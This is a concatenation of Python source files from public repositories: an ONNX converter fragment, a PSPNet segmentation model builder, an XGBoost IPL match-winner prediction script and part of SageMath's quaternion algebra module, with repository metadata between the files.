container.add_node('ArgMax', class_prob_name,
argmax_output_name,
name=scope.get_unique_operator_name('ArgMax'), axis=1)
container.add_node(
'ArrayFeatureExtractor', [classes_name, argmax_output_name],
array_feature_extractor_result_name, op_domain='ai.onnx.ml',
name=scope.get_unique_operator_name('ArrayFeatureExtractor'))
if class_type == onnx_proto.TensorProto.INT32:
apply_reshape(scope, array_feature_extractor_result_name,
reshaped_result_name, container,
desired_shape=output_shape)
apply_cast(scope, reshaped_result_name, operator.outputs[0].full_name,
container, to=onnx_proto.TensorProto.INT64)
else:
apply_reshape(scope, array_feature_extractor_result_name,
operator.outputs[0].full_name, container,
desired_shape=output_shape)
register_converter('SklearnCalibratedClassifierCV',
convert_sklearn_calibrated_classifier_cv,
options={'zipmap': [True, False],
'nocl': [True, False]})
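# Hedged usage sketch (exposition only; the imports below are the standard
# scikit-learn / skl2onnx public API and are assumed, not verified here):
def _example_convert_calibrated_svc(X, y):
    """Fit a CalibratedClassifierCV and convert it via this converter."""
    from sklearn.calibration import CalibratedClassifierCV
    from sklearn.svm import LinearSVC
    from skl2onnx import convert_sklearn
    from skl2onnx.common.data_types import FloatTensorType
    clf = CalibratedClassifierCV(LinearSVC(), method='sigmoid').fit(X, y)
    initial_types = [('input', FloatTensorType([None, X.shape[1]]))]
    return convert_sklearn(clf, initial_types=initial_types)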
| 48.06264
| 79
| 0.536166
|
e81828f108550aa8928e6250be1e8664abb0ecb0
| 4,892
|
py
|
Python
|
MaksimovKA_solution/models/qubvel_segmentation_models/pspnet/model.py
|
ktncktnc/SpaceNet_Off_Nadir_Solutions
|
2a9ef1c3b72fb749c808ddb8593a85cb16b9f1ca
|
[
"Apache-2.0"
] | 164
|
2019-01-31T16:37:09.000Z
|
2022-03-31T02:47:49.000Z
|
MaksimovKA_solution/models/qubvel_segmentation_models/pspnet/model.py
|
xiaofanglegoc/SpaceNet_Off_Nadir_Solutions
|
812f151d244565f29987ebec7683ef42622ae16e
|
[
"Apache-2.0"
] | 3
|
2019-11-20T03:32:29.000Z
|
2021-12-20T05:52:50.000Z
|
MaksimovKA_solution/models/qubvel_segmentation_models/pspnet/model.py
|
xiaofanglegoc/SpaceNet_Off_Nadir_Solutions
|
812f151d244565f29987ebec7683ef42622ae16e
|
[
"Apache-2.0"
] | 36
|
2019-02-08T19:12:35.000Z
|
2021-12-23T06:52:35.000Z
|
from .builder import build_psp
from ..utils import freeze_model
from ..backbones import get_backbone
PSP_BASE_LAYERS = {
'vgg16': ('block5_conv3', 'block4_conv3', 'block3_conv3'),
'vgg19': ('block5_conv4', 'block4_conv4', 'block3_conv4'),
'resnet18': ('stage4_unit1_relu1', 'stage3_unit1_relu1', 'stage2_unit1_relu1'),
'resnet34': ('stage4_unit1_relu1', 'stage3_unit1_relu1', 'stage2_unit1_relu1'),
'resnet50': ('stage4_unit1_relu1', 'stage3_unit1_relu1', 'stage2_unit1_relu1'),
'resnet101': ('stage4_unit1_relu1', 'stage3_unit1_relu1', 'stage2_unit1_relu1'),
'resnet152': ('stage4_unit1_relu1', 'stage3_unit1_relu1', 'stage2_unit1_relu1'),
'resnext50': ('stage4_unit1_relu1', 'stage3_unit1_relu1', 'stage2_unit1_relu1'),
'resnext101': ('stage4_unit1_relu1', 'stage3_unit1_relu1', 'stage2_unit1_relu1'),
'inceptionv3': (228, 86, 16),
'inceptionresnetv2': (594, 260, 16),
'densenet121': (311, 139, 51),
'densenet169': (367, 139, 51),
'densenet201': (479, 139, 51),
}
def _get_layer_by_factor(backbone_name, factor):
if factor == 4:
return PSP_BASE_LAYERS[backbone_name][-1]
elif factor == 8:
return PSP_BASE_LAYERS[backbone_name][-2]
elif factor == 16:
return PSP_BASE_LAYERS[backbone_name][-3]
else:
        raise ValueError('Unsupported factor - `{}`. Use 4, 8 or 16.'.format(factor))
def _shape_guard(factor, shape):
h, w = shape[:2]
min_size = factor * 6
res = (h % min_size != 0 or w % min_size != 0 or
h < min_size or w < min_size)
if res:
raise ValueError('Wrong shape {}, input H and W should '.format(shape) +
'be divisible by `{}`'.format(min_size))
def PSPNet(backbone_name='vgg16',
input_shape=(384, 384, 3),
input_tensor=None,
encoder_weights='imagenet',
freeze_encoder=False,
downsample_factor=8,
psp_conv_filters=512,
psp_pooling_type='avg',
use_batchnorm=False,
dropout=None,
final_interpolation='bilinear',
classes=21,
activation='softmax'):
"""
    Exploit global context information by different-region-based context
    aggregation through a pyramid pooling module, as proposed in the pyramid
    scene parsing network (PSPNet).
https://arxiv.org/pdf/1612.01105.pdf
Args:
backbone_name: (str) look at list of available backbones.
input_shape: (tuple) dimensions of input data (H, W, C).
H and W should be divisible by (6 * `downsample_factor`) and **NOT** `None`!
input_tensor: keras tensor
        encoder_weights: one of `None` (random initialization), 'imagenet'
            (pre-training on ImageNet)
        freeze_encoder: (bool) Set encoder layer weights as non-trainable.
            Useful for fine-tuning.
downsample_factor: int, one of 4, 8 and 16. Specify layer of backbone or
backbone depth to construct PSP module on it.
psp_conv_filters: (int), number of filters in `Conv2D` layer in each psp block
psp_pooling_type: 'avg' or 'max', psp block pooling type (maximum or average)
        use_batchnorm: (bool) if True, add a batch normalisation layer between
            `Conv2D` and `Activation` layers
dropout: None or float in range 0-1, if specified add SpatialDropout after PSP module
final_interpolation: 'duc' or 'bilinear' - interpolation type for final
upsampling layer.
classes: (int) a number of classes for output
activation: (str) one of keras activations
Returns:
keras Model instance
"""
# control image input shape
_shape_guard(downsample_factor, input_shape)
backbone = get_backbone(backbone_name,
input_shape=input_shape,
input_tensor=input_tensor,
weights=encoder_weights,
include_top=False)
psp_layer = _get_layer_by_factor(backbone_name, downsample_factor)
model = build_psp(backbone,
psp_layer,
last_upsampling_factor=downsample_factor,
classes=classes,
conv_filters=psp_conv_filters,
pooling_type=psp_pooling_type,
activation=activation,
use_batchnorm=use_batchnorm,
dropout=dropout,
final_interpolation=final_interpolation)
# lock encoder weights for fine-tuning
if freeze_encoder:
freeze_model(backbone)
model.name = 'psp-{}'.format(backbone_name)
return model
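# Hedged usage sketch (exposition only): 384 x 384 inputs satisfy the shape
# guard above for downsample_factor=8 (divisible by 8 * 6 = 48).
def _example_build_pspnet():
    """Build and compile a binary-segmentation PSPNet on a ResNet-34 encoder."""
    model = PSPNet(backbone_name='resnet34',
                   input_shape=(384, 384, 3),
                   downsample_factor=8,
                   classes=1,
                   activation='sigmoid')
    model.compile(optimizer='adam', loss='binary_crossentropy')
    return model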
| 40.429752
| 95
| 0.612837
|
0072acb74b687e224cf9168fd48d2c02ccaed7eb
| 2,334
|
py
|
Python
|
main.py
|
keshav-b/Hala-IPL
|
b17aa9c27e78c7b19977eb6115a8b80992acab22
|
[
"MIT"
] | 1
|
2019-08-17T07:23:56.000Z
|
2019-08-17T07:23:56.000Z
|
main.py
|
keshav-b/IPL-Prediction
|
b17aa9c27e78c7b19977eb6115a8b80992acab22
|
[
"MIT"
] | null | null | null |
main.py
|
keshav-b/IPL-Prediction
|
b17aa9c27e78c7b19977eb6115a8b80992acab22
|
[
"MIT"
] | null | null | null |
import pandas as pd
import numpy as np
from sklearn.model_selection import train_test_split
from sklearn import svm
from sklearn.preprocessing import LabelEncoder
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import f1_score
from xgboost import XGBClassifier
import matplotlib.pyplot
#importing the dataset
data = pd.read_csv('matches.csv')
data1 = data
#checking if there are any missing data
miss_bool = data['winner'].isnull()
print(sum(miss_bool))
#dropping rows where all values are NULL
data = data.dropna(how = 'all')
#dropping those columns that aren't useful for prediction
data = data.drop(['dl_applied','umpire1','id','umpire2','umpire3','date','win_by_runs',
'win_by_wickets','player_of_match','result','city','season','venue'], axis=1)
#normalize the inconsistent team name spelling
data = data.replace('Rising Pune Supergiants', 'Rising Pune Supergiant')
#encoding the values using label encoder
le = LabelEncoder()
cols = ['team1','team2','winner','toss_winner','toss_decision']
for i in cols:
data[i] = le.fit_transform(data[i])
#splitting into X and y
x = data.drop(['winner'],axis=1)
y = data['winner']
teams = ['Royal Challengers Bangalore',
'Sunrisers Hyderabad',
'Rajasthan Royals',
'Mumbai Indians',
'Kolkata Knight Riders',
'Kings XI Punjab',
'Delhi Capitals',
'Chennai Super Kings',
'Gujarat Lions',
'Rising Pune Supergiant',
'Pune Warriors India',
'Kochi Tuskers Kerala',
'Deccan Chargers']
teams.sort()
teams_le = le.fit_transform(teams)
#Train/Test Split
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=.30, random_state=1008)
#--------------------------------------SVM
'''
svm = svm.SVC(gamma = 'scale')
svm.fit(x_train, y_train)
y_pred = svm.predict(x_test)
print(f1_score(y_test,y_pred, average='micro'))
#--------------------------------------Random Forest
classifier = RandomForestClassifier(n_estimators = 10, criterion = 'entropy', random_state = 0)
classifier.fit(x_train, y_train)
y_pred1 = classifier.predict(x_test)
print(f1_score(y_test,y_pred1,average='micro'))
'''
#--------------------------------------XGBoost
xg = XGBClassifier()
xg.fit(x_train, y_train)
y_pred2 = xg.predict(x_test)
print("The F1 Score of the XGBoost is: ",f1_score(y_test,y_pred2,average='micro'))
import pickle
with open('model.pickle','wb') as k:
pickle.dump(xg,k)
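# Hedged usage sketch (exposition only): reload the model persisted above
# and score one held-out fixture to confirm the pickle round trip works.
with open('model.pickle', 'rb') as k:
    loaded_model = pickle.load(k)
print("Reloaded model prediction (encoded winner):", loaded_model.predict(x_test[:1]))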
| 26.224719
| 95
| 0.70437
|
43acdc7566deb1d35a1b253470c98b6a46510aca
| 105,444
|
py
|
Python
|
src/sage/algebras/quatalg/quaternion_algebra.py
|
fredstro/sage
|
c936d2cda81ec7ec3552a3bdb29c994b40d1bb24
|
[
"BSL-1.0"
] | null | null | null |
src/sage/algebras/quatalg/quaternion_algebra.py
|
fredstro/sage
|
c936d2cda81ec7ec3552a3bdb29c994b40d1bb24
|
[
"BSL-1.0"
] | null | null | null |
src/sage/algebras/quatalg/quaternion_algebra.py
|
fredstro/sage
|
c936d2cda81ec7ec3552a3bdb29c994b40d1bb24
|
[
"BSL-1.0"
] | null | null | null |
"""
Quaternion Algebras
AUTHORS:
- Jon Bobber (2009): rewrite
- William Stein (2009): rewrite
- Julian Rueth (2014-03-02): use UniqueFactory for caching
This code is partly based on Sage code by David Kohel from 2005.
TESTS:
Pickling test::
sage: Q.<i,j,k> = QuaternionAlgebra(QQ,-5,-2)
sage: Q == loads(dumps(Q))
True
"""
#*****************************************************************************
# Copyright (C) 2009 William Stein <wstein@gmail.com>
# Copyright (C) 2009 Jonathan Bober <jwbober@gmail.com>
# Copyright (C) 2014 Julian Rueth <julian.rueth@fsfe.org>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
# http://www.gnu.org/licenses/
#*****************************************************************************
from __future__ import print_function
from sage.arith.all import (hilbert_conductor_inverse, hilbert_conductor,
factor, gcd, lcm, kronecker_symbol, valuation)
from sage.rings.all import RR, Integer
from sage.rings.integer_ring import ZZ
from sage.rings.rational import Rational
from sage.rings.finite_rings.finite_field_constructor import GF
from sage.rings.ring import Algebra
from sage.rings.ideal import Ideal_fractional
from sage.rings.rational_field import is_RationalField, QQ
from sage.rings.infinity import infinity
from sage.rings.number_field.number_field import is_NumberField
from sage.structure.category_object import normalize_names
from sage.structure.parent_gens import ParentWithGens
from sage.matrix.matrix_space import MatrixSpace
from sage.matrix.constructor import diagonal_matrix, matrix
from sage.structure.sequence import Sequence
from sage.structure.element import is_RingElement
from sage.structure.factory import UniqueFactory
from sage.modules.free_module import VectorSpace, FreeModule
from sage.modules.free_module_element import vector
from operator import itemgetter
import quaternion_algebra_element
import quaternion_algebra_cython
from sage.modular.modsym.p1list import P1List
from sage.misc.cachefunc import cached_method
from sage.categories.fields import Fields
_Fields = Fields()
########################################################
# Constructor
########################################################
class QuaternionAlgebraFactory(UniqueFactory):
"""
There are three input formats:
- ``QuaternionAlgebra(a, b)``: quaternion algebra generated by ``i``, ``j``
subject to `i^2 = a`, `j^2 = b`, `j \cdot i = -i \cdot j`.
- ``QuaternionAlgebra(K, a, b)``: same as above but over a field ``K``.
Here, ``a`` and ``b`` are nonzero elements of a field (``K``) of
characteristic not 2, and we set `k = i \cdot j`.
- ``QuaternionAlgebra(D)``: a rational quaternion algebra with
      discriminant ``D``, where ``D`` is a squarefree positive integer.
EXAMPLES:
``QuaternionAlgebra(a, b)`` - return quaternion algebra over the
*smallest* field containing the nonzero elements ``a`` and ``b`` with
generators ``i``, ``j``, ``k`` with `i^2=a`, `j^2=b` and `j \cdot i =
-i \cdot j`::
sage: QuaternionAlgebra(-2,-3)
Quaternion Algebra (-2, -3) with base ring Rational Field
sage: QuaternionAlgebra(GF(5)(2), GF(5)(3))
Quaternion Algebra (2, 3) with base ring Finite Field of size 5
sage: QuaternionAlgebra(2, GF(5)(3))
Quaternion Algebra (2, 3) with base ring Finite Field of size 5
sage: QuaternionAlgebra(QQ[sqrt(2)](-1), -5)
Quaternion Algebra (-1, -5) with base ring Number Field in sqrt2 with defining polynomial x^2 - 2
sage: QuaternionAlgebra(sqrt(-1), sqrt(-3))
Quaternion Algebra (I, sqrt(-3)) with base ring Symbolic Ring
sage: QuaternionAlgebra(1r,1)
Quaternion Algebra (1, 1) with base ring Rational Field
Python ints, longs and floats may be passed to the
``QuaternionAlgebra(a, b)`` constructor, as may all pairs of nonzero
elements of a ring not of characteristic 2. The following tests address
the issues raised in :trac:`10601`::
sage: QuaternionAlgebra(1r,1)
Quaternion Algebra (1, 1) with base ring Rational Field
sage: QuaternionAlgebra(1,1.0r)
Quaternion Algebra (1.00000000000000, 1.00000000000000) with base ring Real Field with 53 bits of precision
sage: QuaternionAlgebra(0,0)
Traceback (most recent call last):
...
ValueError: a and b must be nonzero
sage: QuaternionAlgebra(GF(2)(1),1)
Traceback (most recent call last):
...
ValueError: a and b must be elements of a ring with characteristic not 2
sage: a = PermutationGroupElement([1,2,3])
sage: QuaternionAlgebra(a, a)
Traceback (most recent call last):
...
ValueError: a and b must be elements of a ring with characteristic not 2
``QuaternionAlgebra(K, a, b)`` - return quaternion algebra over the
field ``K`` with generators ``i``, ``j``, ``k`` with `i^2=a`, `j^2=b`
and `i \cdot j = -j \cdot i`::
sage: QuaternionAlgebra(QQ, -7, -21)
Quaternion Algebra (-7, -21) with base ring Rational Field
sage: QuaternionAlgebra(QQ[sqrt(2)], -2,-3)
Quaternion Algebra (-2, -3) with base ring Number Field in sqrt2 with defining polynomial x^2 - 2
``QuaternionAlgebra(D)`` - ``D`` is a squarefree integer; returns a
rational quaternion algebra of discriminant ``D``::
sage: QuaternionAlgebra(1)
Quaternion Algebra (-1, 1) with base ring Rational Field
sage: QuaternionAlgebra(2)
Quaternion Algebra (-1, -1) with base ring Rational Field
sage: QuaternionAlgebra(7)
Quaternion Algebra (-1, -7) with base ring Rational Field
sage: QuaternionAlgebra(2*3*5*7)
Quaternion Algebra (-22, 210) with base ring Rational Field
If the coefficients `a` and `b` in the definition of the quaternion
algebra are not integral, then a slower generic type is used for
arithmetic::
sage: type(QuaternionAlgebra(-1,-3).0)
<type 'sage.algebras.quatalg.quaternion_algebra_element.QuaternionAlgebraElement_rational_field'>
sage: type(QuaternionAlgebra(-1,-3/2).0)
<type 'sage.algebras.quatalg.quaternion_algebra_element.QuaternionAlgebraElement_generic'>
Make sure caching is sane::
sage: A = QuaternionAlgebra(2,3); A
Quaternion Algebra (2, 3) with base ring Rational Field
sage: B = QuaternionAlgebra(GF(5)(2),GF(5)(3)); B
Quaternion Algebra (2, 3) with base ring Finite Field of size 5
sage: A is QuaternionAlgebra(2,3)
True
sage: B is QuaternionAlgebra(GF(5)(2),GF(5)(3))
True
sage: Q = QuaternionAlgebra(2); Q
Quaternion Algebra (-1, -1) with base ring Rational Field
sage: Q is QuaternionAlgebra(QQ,-1,-1)
True
sage: Q is QuaternionAlgebra(-1,-1)
True
sage: Q.<ii,jj,kk> = QuaternionAlgebra(15); Q.variable_names()
('ii', 'jj', 'kk')
sage: QuaternionAlgebra(15).variable_names()
('i', 'j', 'k')
TESTS:
Verify that bug found when working on :trac:`12006` involving coercing
invariants into the base field is fixed::
sage: Q = QuaternionAlgebra(-1,-1); Q
Quaternion Algebra (-1, -1) with base ring Rational Field
sage: parent(Q._a)
Rational Field
sage: parent(Q._b)
Rational Field
"""
def create_key(self, arg0, arg1=None, arg2=None, names='i,j,k'):
"""
Create a key that uniquely determines a quaternion algebra.
TESTS::
sage: QuaternionAlgebra.create_key(-1,-1)
(Rational Field, -1, -1, ('i', 'j', 'k'))
"""
# QuaternionAlgebra(D)
if arg1 is None and arg2 is None:
K = QQ
D = Integer(arg0)
a, b = hilbert_conductor_inverse(D)
a = Rational(a); b = Rational(b)
elif arg2 is None:
# If arg0 or arg1 are Python data types, coerce them
# to the relevant Sage types. This is a bit inelegant.
L = []
for a in [arg0,arg1]:
if is_RingElement(a):
L.append(a)
elif isinstance(a, int) or isinstance(a, long):
L.append(Integer(a))
elif isinstance(a, float):
L.append(RR(a))
else:
raise ValueError("a and b must be elements of a ring with characteristic not 2")
# QuaternionAlgebra(a, b)
v = Sequence(L)
K = v.universe().fraction_field()
a = K(v[0])
b = K(v[1])
# QuaternionAlgebra(K, a, b)
else:
K = arg0
if K not in _Fields:
raise TypeError("base ring of quaternion algebra must be a field")
a = K(arg1)
b = K(arg2)
if K.characteristic() == 2:
            # Quaternion algebras are not defined in characteristic 2.
raise ValueError("a and b must be elements of a ring with characteristic not 2")
if a == 0 or b == 0:
raise ValueError("a and b must be nonzero")
names = normalize_names(3, names)
return (K, a, b, names)
def create_object(self, version, key, **extra_args):
"""
Create the object from the key (extra arguments are ignored). This is
only called if the object was not found in the cache.
TESTS::
sage: QuaternionAlgebra.create_object("6.0", (QQ, -1, -1, ('i', 'j', 'k')))
Quaternion Algebra (-1, -1) with base ring Rational Field
"""
K, a, b, names = key
return QuaternionAlgebra_ab(K, a, b, names=names)
QuaternionAlgebra = QuaternionAlgebraFactory("QuaternionAlgebra")
########################################################
# Classes
########################################################
def is_QuaternionAlgebra(A):
"""
Return ``True`` if ``A`` is of the QuaternionAlgebra data type.
EXAMPLES::
sage: sage.algebras.quatalg.quaternion_algebra.is_QuaternionAlgebra(QuaternionAlgebra(QQ,-1,-1))
True
sage: sage.algebras.quatalg.quaternion_algebra.is_QuaternionAlgebra(ZZ)
False
"""
return isinstance(A, QuaternionAlgebra_abstract)
class QuaternionAlgebra_abstract(Algebra):
def _repr_(self):
"""
EXAMPLES::
sage: sage.algebras.quatalg.quaternion_algebra.QuaternionAlgebra_abstract(QQ)._repr_()
'Quaternion Algebra with base ring Rational Field'
"""
return "Quaternion Algebra with base ring %s"%self.base_ring()
def ngens(self):
"""
Return the number of generators of the quaternion algebra as a K-vector
space, not including 1. This value is always 3: the algebra is spanned
by the standard basis `1`, `i`, `j`, `k`.
EXAMPLES::
sage: Q.<i,j,k> = QuaternionAlgebra(QQ,-5,-2)
sage: Q.ngens()
3
sage: Q.gens()
[i, j, k]
"""
return 3
def basis(self):
"""
Return the fixed basis of ``self``, which is `1`, `i`, `j`, `k`, where
`i`, `j`, `k` are the generators of ``self``.
EXAMPLES::
sage: Q.<i,j,k> = QuaternionAlgebra(QQ,-5,-2)
sage: Q.basis()
(1, i, j, k)
sage: Q.<xyz,abc,theta> = QuaternionAlgebra(GF(9,'a'),-5,-2)
sage: Q.basis()
(1, xyz, abc, theta)
The basis is cached::
sage: Q.basis() is Q.basis()
True
"""
try:
return self.__basis
except AttributeError:
self.__basis = tuple([self(1)] + list(self.gens()))
return self.__basis
def inner_product_matrix(self):
"""
Return the inner product matrix associated to ``self``, i.e. the
Gram matrix of the reduced norm as a quadratic form on ``self``.
The standard basis `1`, `i`, `j`, `k` is orthogonal, so this matrix
        is just the diagonal matrix with diagonal entries `2`, `-2a`, `-2b`,
        `2ab`.
EXAMPLES::
sage: Q.<i,j,k> = QuaternionAlgebra(-5,-19)
sage: Q.inner_product_matrix()
[ 2 0 0 0]
[ 0 10 0 0]
[ 0 0 38 0]
[ 0 0 0 190]
"""
try: return self.__inner_product_matrix
except AttributeError: pass
a, b = self._a, self._b
M = diagonal_matrix(self.base_ring(), [2, -2*a, -2*b, 2*a*b])
M.set_immutable()
self.__inner_product_matrix = M
return M
def is_commutative(self):
"""
Return ``False`` always, since all quaternion algebras are
noncommutative.
EXAMPLES::
sage: Q.<i,j,k> = QuaternionAlgebra(QQ, -3,-7)
sage: Q.is_commutative()
False
"""
return False
def is_division_algebra(self):
"""
Return ``True`` if the quaternion algebra is a division algebra (i.e.
every nonzero element in ``self`` is invertible), and ``False`` if the
quaternion algebra is isomorphic to the 2x2 matrix algebra.
EXAMPLES::
sage: QuaternionAlgebra(QQ,-5,-2).is_division_algebra()
True
sage: QuaternionAlgebra(1).is_division_algebra()
False
sage: QuaternionAlgebra(2,9).is_division_algebra()
False
sage: QuaternionAlgebra(RR(2.),1).is_division_algebra()
Traceback (most recent call last):
...
NotImplementedError: base field must be rational numbers
"""
if not is_RationalField(self.base_ring()):
raise NotImplementedError("base field must be rational numbers")
return self.discriminant() != 1
def is_matrix_ring(self):
"""
Return ``True`` if the quaternion algebra is isomorphic to the 2x2
matrix ring, and ``False`` if ``self`` is a division algebra (i.e.
every nonzero element in ``self`` is invertible).
EXAMPLES::
sage: QuaternionAlgebra(QQ,-5,-2).is_matrix_ring()
False
sage: QuaternionAlgebra(1).is_matrix_ring()
True
sage: QuaternionAlgebra(2,9).is_matrix_ring()
True
sage: QuaternionAlgebra(RR(2.),1).is_matrix_ring()
Traceback (most recent call last):
...
NotImplementedError: base field must be rational numbers
"""
if not is_RationalField(self.base_ring()):
raise NotImplementedError("base field must be rational numbers")
return self.discriminant() == 1
def is_exact(self):
"""
Return ``True`` if elements of this quaternion algebra are represented
exactly, i.e. there is no precision loss when doing arithmetic. A
quaternion algebra is exact if and only if its base field is
exact.
EXAMPLES::
sage: Q.<i,j,k> = QuaternionAlgebra(QQ, -3, -7)
sage: Q.is_exact()
True
sage: Q.<i,j,k> = QuaternionAlgebra(Qp(7), -3, -7)
sage: Q.is_exact()
False
"""
return self.base_ring().is_exact()
def is_field(self, proof = True):
"""
Return ``False`` always, since all quaternion algebras are
noncommutative and all fields are commutative.
EXAMPLES::
sage: Q.<i,j,k> = QuaternionAlgebra(QQ, -3, -7)
sage: Q.is_field()
False
"""
return False
def is_finite(self):
"""
Return ``True`` if the quaternion algebra is finite as a set.
Algorithm: A quaternion algebra is finite if and only if the
base field is finite.
EXAMPLES::
sage: Q.<i,j,k> = QuaternionAlgebra(QQ, -3, -7)
sage: Q.is_finite()
False
sage: Q.<i,j,k> = QuaternionAlgebra(GF(5), -3, -7)
sage: Q.is_finite()
True
"""
return self.base_ring().is_finite()
def is_integral_domain(self, proof = True):
"""
Return ``False`` always, since all quaternion algebras are
noncommutative and integral domains are commutative (in Sage).
EXAMPLES::
sage: Q.<i,j,k> = QuaternionAlgebra(QQ, -3, -7)
sage: Q.is_integral_domain()
False
"""
return False
def is_noetherian(self):
"""
Return ``True`` always, since any quaternion algebra is a noetherian
ring (because it is a finitely generated module over a field).
EXAMPLES::
sage: Q.<i,j,k> = QuaternionAlgebra(QQ, -3, -7)
sage: Q.is_noetherian()
True
"""
return True
def order(self):
"""
Return the number of elements of the quaternion algebra, or
``+Infinity`` if the algebra is not finite.
EXAMPLES::
sage: Q.<i,j,k> = QuaternionAlgebra(QQ, -3, -7)
sage: Q.order()
+Infinity
sage: Q.<i,j,k> = QuaternionAlgebra(GF(5), -3, -7)
sage: Q.order()
625
"""
return (self.base_ring().order())**4
def random_element(self, *args, **kwds):
"""
Return a random element of this quaternion algebra.
The ``args`` and ``kwds`` are passed to the ``random_element`` method
of the base ring.
EXAMPLES::
sage: QuaternionAlgebra(QQ[sqrt(2)],-3,7).random_element()
(sqrt2 + 2)*i + (-12*sqrt2 - 2)*j + (-sqrt2 + 1)*k
sage: QuaternionAlgebra(-3,19).random_element()
-1 + 2*i - j - 6/5*k
sage: QuaternionAlgebra(GF(17)(2),3).random_element()
14 + 10*i + 4*j + 7*k
Specify the numerator and denominator bounds::
sage: QuaternionAlgebra(-3,19).random_element(10^6,10^6)
-979933/553629 + 255525/657688*i - 3511/6929*j - 700105/258683*k
"""
K = self.base_ring()
return self([ K.random_element(*args, **kwds) for _ in range(4) ])
def vector_space(self):
"""
Return the vector space associated to ``self`` with inner product given
by the reduced norm.
EXAMPLES::
sage: QuaternionAlgebra(-3,19).vector_space()
Ambient quadratic space of dimension 4 over Rational Field
Inner product matrix:
[ 2 0 0 0]
[ 0 6 0 0]
[ 0 0 -38 0]
[ 0 0 0 -114]
"""
try:
return self.__vector_space
except AttributeError:
V = VectorSpace(self.base_ring(), 4, inner_product_matrix = self.inner_product_matrix())
self.__vector_space = V
return V
class QuaternionAlgebra_ab(QuaternionAlgebra_abstract):
"""
The quaternion algebra of the form `(a, b/K)`, where `i^2=a`, `j^2 = b`,
and `j*i = -i*j`. ``K`` is a field not of characteristic 2 and ``a``,
``b`` are nonzero elements of ``K``.
See ``QuaternionAlgebra`` for many more examples.
INPUT:
- ``base_ring`` -- commutative ring
- ``a, b`` -- elements of ``base_ring``
- ``names`` -- string (optional, default 'i,j,k') names of the generators
EXAMPLES::
sage: QuaternionAlgebra(QQ, -7, -21) # indirect doctest
Quaternion Algebra (-7, -21) with base ring Rational Field
"""
def __init__(self, base_ring, a, b, names='i,j,k'):
"""
Create the quaternion algebra with `i^2 = a`, `j^2 = b`, and
`i*j = -j*i = k`.
TESTS:
Test making quaternion elements (using the element constructor)::
sage: Q.<i,j,k> = QuaternionAlgebra(QQ,-1,-2)
sage: a = Q(2/3); a
2/3
sage: type(a)
<type 'sage.algebras.quatalg.quaternion_algebra_element.QuaternionAlgebraElement_rational_field'>
sage: Q(a)
2/3
sage: Q([1,2,3,4])
1 + 2*i + 3*j + 4*k
sage: Q((1,2,3,4))
1 + 2*i + 3*j + 4*k
sage: Q(-3/5)
-3/5
The base ring must be a field::
sage: Q.<ii,jj,kk> = QuaternionAlgebra(ZZ,-5,-19)
Traceback (most recent call last):
...
TypeError: base ring of quaternion algebra must be a field
"""
ParentWithGens.__init__(self, base_ring, names=names)
self._a = a
self._b = b
if base_ring not in _Fields:
raise TypeError("base ring of quaternion algebra must be a field")
if is_RationalField(base_ring) and a.denominator() == 1 and b.denominator() == 1:
element_constructor = quaternion_algebra_element.QuaternionAlgebraElement_rational_field
elif is_NumberField(base_ring) and base_ring.degree() > 2 and base_ring.is_absolute() and \
a.denominator() == 1 and b.denominator() == 1 and base_ring.defining_polynomial().is_monic():
# This QuaternionAlgebraElement_number_field class is not
# designed to work with elements of a quadratic field. To
# do that, the main thing would be to implement
# __getitem__, etc. This would maybe give a factor of 2
# (or more?) speedup. Much care must be taken because the
# underlying representation of quadratic fields is a bit
# tricky.
element_constructor = quaternion_algebra_element.QuaternionAlgebraElement_number_field
else:
element_constructor = quaternion_algebra_element.QuaternionAlgebraElement_generic
self._populate_coercion_lists_(coerce_list=[base_ring], element_constructor=element_constructor)
self._gens = [self([0,1,0,0]), self([0,0,1,0]), self([0,0,0,1])]
def maximal_order(self, take_shortcuts = True):
r"""
Return a maximal order in this quaternion algebra.
The algorithm used is from [Voi2012]_.
INPUT:
- ``take_shortcuts`` -- (default: ``True``) if the discriminant is
prime and the invariants of the algebra are of a nice form, use
Proposition 5.2 of [Piz1980]_.
OUTPUT:
A maximal order in this quaternion algebra.
EXAMPLES::
sage: QuaternionAlgebra(-1,-7).maximal_order()
Order of Quaternion Algebra (-1, -7) with base ring Rational Field with basis (1/2 + 1/2*j, 1/2*i + 1/2*k, j, k)
sage: QuaternionAlgebra(-1,-1).maximal_order().basis()
(1/2 + 1/2*i + 1/2*j + 1/2*k, i, j, k)
sage: QuaternionAlgebra(-1,-11).maximal_order().basis()
(1/2 + 1/2*j, 1/2*i + 1/2*k, j, k)
sage: QuaternionAlgebra(-1,-3).maximal_order().basis()
(1/2 + 1/2*j, 1/2*i + 1/2*k, j, k)
sage: QuaternionAlgebra(-3,-1).maximal_order().basis()
(1/2 + 1/2*i, 1/2*j - 1/2*k, i, -k)
sage: QuaternionAlgebra(-2,-5).maximal_order().basis()
(1/2 + 1/2*j + 1/2*k, 1/4*i + 1/2*j + 1/4*k, j, k)
sage: QuaternionAlgebra(-5,-2).maximal_order().basis()
(1/2 + 1/2*i - 1/2*k, 1/2*i + 1/4*j - 1/4*k, i, -k)
sage: QuaternionAlgebra(-17,-3).maximal_order().basis()
(1/2 + 1/2*j, 1/2*i + 1/2*k, -1/3*j - 1/3*k, k)
sage: QuaternionAlgebra(-3,-17).maximal_order().basis()
(1/2 + 1/2*i, 1/2*j - 1/2*k, -1/3*i + 1/3*k, -k)
sage: QuaternionAlgebra(-17*9,-3).maximal_order().basis()
(1, 1/3*i, 1/6*i + 1/2*j, 1/2 + 1/3*j + 1/18*k)
sage: QuaternionAlgebra(-2, -389).maximal_order().basis()
(1/2 + 1/2*j + 1/2*k, 1/4*i + 1/2*j + 1/4*k, j, k)
If you want bases containing 1, switch off ``take_shortcuts``::
sage: QuaternionAlgebra(-3,-89).maximal_order(take_shortcuts=False)
Order of Quaternion Algebra (-3, -89) with base ring Rational Field with basis (1, 1/2 + 1/2*i, j, 1/2 + 1/6*i + 1/2*j + 1/6*k)
sage: QuaternionAlgebra(1,1).maximal_order(take_shortcuts=False) # Matrix ring
Order of Quaternion Algebra (1, 1) with base ring Rational Field with basis (1, 1/2 + 1/2*i, j, 1/2*j + 1/2*k)
sage: QuaternionAlgebra(-22,210).maximal_order(take_shortcuts=False)
